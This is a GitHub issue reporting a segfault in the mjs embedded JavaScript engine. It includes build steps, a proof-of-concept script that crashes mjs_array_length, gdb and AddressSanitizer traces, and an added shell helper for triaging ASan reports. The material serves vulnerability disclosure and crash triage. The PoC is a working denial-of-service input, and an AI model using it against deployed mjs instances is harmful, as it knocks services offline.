cesanta / mjs

Embedded JavaScript engine for C/C++
https://mongoose-os.com

Segmentation fault on mjs_array_length #287

Open CStriker opened 3 months ago

CStriker commented 3 months ago

Affected product: mjs

Affected version: commit b1b6eac (tag 2.20.0)

Description: An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_array_length function in the mjs.c file.

Vulnerability type: Segmentation fault

Environment

Ubuntu 20.04

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan
poc

```
let c = { a: 7111.111, a: 7111.1111, foo: ffi-= 62.1-11, foo: 1.1111, foo: ffi-= 66111, a: 7111.1111, foo: ffi-= 62.1-11, foo: 1.1111, foo: ffi-= 66.1511, foo: ffi-= 66.1511, foo: ffi-= 1, foo: ffi-= 111, foo: ffi-= 66.1511, foo: ffi('iit)««««««o: 1.«'), };
```

run command

./mjs-asan -f poc

gdb info

Program received signal SIGSEGV, Segmentation fault.
0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
6929    unsigned long mjs_array_length(struct mjs *mjs, mjs_val_t v) {
#0  0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
#1  0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", 
    src=0x612000000040 " let c = {\n  a: 7111.111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n  foo: 1.1111,\nfoo: ffi-=\t66111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n  foo: 1.1111,\nfoo: ffi-=\t66.1511,\n\tfoo: ffi-=\t66.1511,\n\t \nfoo: ffi-=\t\t\t\t"..., generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044
#2  0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", res=0x7fffffffdb80) at mjs.c:9067
#3  0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406

AddressSanitizer info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1337947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557938f bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1337947==The signal is caused by a READ memory access.
==1337947==Hint: address points to the zero page.
    #0 0x55555557938e in mjs_array_length /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929
    #1 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
    #2 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067
    #3 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406
    #4 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308
    #5 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 in mjs_array_length
==1337947==ABORTING
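The report above is CStriker's. What follows is an added example, not the reporter's code and not part of mjs: a POSIX sh script that wraps the build-and-run commands from the report in a function and adds a small triage helper for AddressSanitizer output, since the first thing a reader of such a report wants to know is what kind of crash it is (here: a READ of the zero page in mjs_array_length, which supports the denial-of-service claim but is not by itself evidence of a controllable write). The function names asan_triage, asan_is_null_read, repro_mjs_287 and the clone directory mjs-287 are my own; the embedded sample report is copied from the ASan output above.

```sh
#!/bin/sh
# Added example: reproduction-and-triage helper for ASan crash reports like
# the one in this issue. Not part of mjs; function names are assumptions.

# Print a one-line summary of an AddressSanitizer report read from stdin:
#   <kind> <access> <zero-page> <function> <file:line>
# e.g. "SEGV READ yes mjs_array_length mjs.c:6929"
asan_triage() {
  log=$(cat)
  # "ERROR: AddressSanitizer: SEGV ..." or "... heap-buffer-overflow ..."
  kind=$(printf '%s\n' "$log" |
    sed -n 's/.*ERROR: AddressSanitizer: \([A-Za-z-]*\).*/\1/p' | head -n 1)
  # "The signal is caused by a READ memory access." (SEGV reports only)
  access=$(printf '%s\n' "$log" |
    sed -n 's/.*signal is caused by a \([A-Z]*\) memory access.*/\1/p' | head -n 1)
  # ASan prints this hint when the fault address lies in the first page,
  # i.e. a NULL or near-NULL dereference.
  if printf '%s\n' "$log" | grep -q 'address points to the zero page'; then
    zero=yes
  else
    zero=no
  fi
  # Innermost frame: "    #0 0x... in <function> <path>:<line>"
  frame=$(printf '%s\n' "$log" |
    sed -n 's/^[[:space:]]*#0 0x[0-9a-f]* in \([A-Za-z_][A-Za-z0-9_]*\) \(.*\)$/\1 \2/p' |
    head -n 1)
  func=${frame%% *}
  loc=${frame#* }
  loc=${loc##*/}   # drop the directory part, keep file:line
  printf '%s %s %s %s %s\n' "${kind:-unknown}" "${access:-unknown}" "$zero" \
    "${func:-unknown}" "${loc:-unknown}"
}

# Exit 0 when the report is a plain read of the zero page (NULL-style
# dereference): a crash, but no evidence of a controllable write.
asan_is_null_read() {
  set -- $(asan_triage)
  [ "$1" = SEGV ] && [ "$2" = READ ] && [ "$3" = yes ]
}

# The reporter's build-and-run steps, wrapped so the ASan output goes straight
# into the triage helper. Needs git, gcc with ASan support and network access,
# so it is not exercised when this file runs offline. $1: absolute path to the
# PoC file.
repro_mjs_287() {
  (
    git clone https://github.com/cesanta/mjs mjs-287 &&
    cd mjs-287 &&
    git checkout b1b6eac &&
    gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan &&
    ./mjs-asan -f "$1" 2>&1
  ) | asan_triage
}

# Sample input: the lines of the ASan report above that the helper uses.
SAMPLE_REPORT='==1337947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557938f bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1337947==The signal is caused by a READ memory access.
==1337947==Hint: address points to the zero page.
    #0 0x55555557938e in mjs_array_length /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929
    #1 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 in mjs_array_length'

# Offline demo: triage the embedded report.
triage_demo() {
  printf '%s\n' "$SAMPLE_REPORT" | asan_triage
}
triage_demo
```

Run it as `sh triage.sh` to get the one-line summary for the embedded report, or source it and call `repro_mjs_287 /abs/path/to/poc` to rebuild the reporter's binary and triage a fresh run. One thing the helper cannot settle: gdb's frame #0 prints mjs=0x1000000010, while frames #1 and #2 hold mjs=0x615000000080 and the fault address is 0, so the argument values shown for frame #0 should not be taken at face value; stepping to mjs.c:9044 and mjs.c:6929 in the checked-out tree is the way to see which pointer is actually dereferenced.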